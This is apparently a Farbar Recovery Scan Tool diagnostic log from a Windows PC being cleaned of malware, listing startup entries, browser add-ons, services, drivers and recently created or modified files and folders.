C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program 
Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)BootExecute: autocheck autochk * BootDefrag.exesasnative32 ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearchHKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-usSearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No FileDPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cabDPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cabDPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cabHandler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3 FireFox:========FF Plugin: @Apple.com/iTunes,version=1.0 -> 
C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtensionFF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 Chrome: =======CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [] ========================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) 
R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) 
[File not signed]S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) 
S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) 
[File not signed]U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]S3 catchme; \??\C:\ComboFix\catchme.sys [X]S3 IpInIp; system32\DRIVERS\ipinip.sys [X]S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 
2014-08-24 15:45 - 2014-08-24 15:45 - 00046297 _____ () C:\ComboFix.txt2014-08-24 15:23 - 2014-08-24 15:46 - 00000000 ____D () C:\ComboFix2014-08-23 16:54 - 2014-08-25 09:47 - 00000000 ____D () C:\FRST2014-08-23 16:30 - 2014-08-25 09:35 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-08-23 16:30 - 2014-08-25 08:26 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () 
C:\Users\savas.kyriakidis\Desktop\JRT.txt2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT2014-08-23 11:02 - 2014-08-23 11:05 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK2014-08-22 16:12 - 2014-08-25 09:17 - 00039662 _____ () C:\Windows\PFRO.log2014-08-22 15:52 - 2014-08-24 15:45 - 00000000 ____D () C:\Qoobox2014-08-22 14:32 - 2014-08-22 15:42 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development2014-08-22 13:25 - 2014-08-25 08:17 - 00000850 _____ () C:\Windows\setupact.log2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ 
(AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG20142014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 
_____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled2014-08-14 18:20 - 2014-08-25 09:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 52014-08-14 18:19 - 2014-08-25 09:19 - 00000000 ____D () C:\Program Files\Glary Utilities 52014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () 
C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a4952014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-12 16:51 - 2014-08-25 09:16 - 00000000 ____D () C:\ProgramData\IrfuqApivh ==================== One Month Modified Files and Folders 
======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-08-25 09:47 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST2014-08-25 09:47 - 2014-07-18 00:39 - 01989969 _____ () C:\Windows\WindowsUpdate.log2014-08-25 09:44 - 2011-12-22 18:52 - 00001356 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat2014-08-25 09:35 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-08-25 09:23 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI2014-08-25 09:20 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job2014-08-25 09:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 52014-08-25 09:18 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job2014-08-25 09:17 - 2014-08-22 16:12 - 00039662 _____ () C:\Windows\PFRO.log2014-08-25 09:17 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT2014-08-25 09:17 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A02014-08-25 09:17 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A02014-08-25 09:16 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh2014-08-25 09:16 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system2014-08-25 09:15 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT2014-08-25 08:26 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware2014-08-25 08:17 - 2014-08-22 13:25 - 00000850 _____ () C:\Windows\setupact.log2014-08-24 15:46 - 2014-08-24 15:23 - 
00000000 ____D () C:\ComboFix2014-08-24 15:45 - 2014-08-24 15:45 - 00046297 _____ () C:\ComboFix.txt2014-08-24 15:45 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox2014-08-24 15:40 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini2014-08-24 15:38 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-23 11:05 - 2014-08-23 11:02 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a4952014-08-22 15:42 - 2014-08-22 14:32 - 00000000 ____D () C:\ProgramData\Spybot - Search & 
Destroy.BackupBySpybotPortable2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG20142014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG2014-08-17 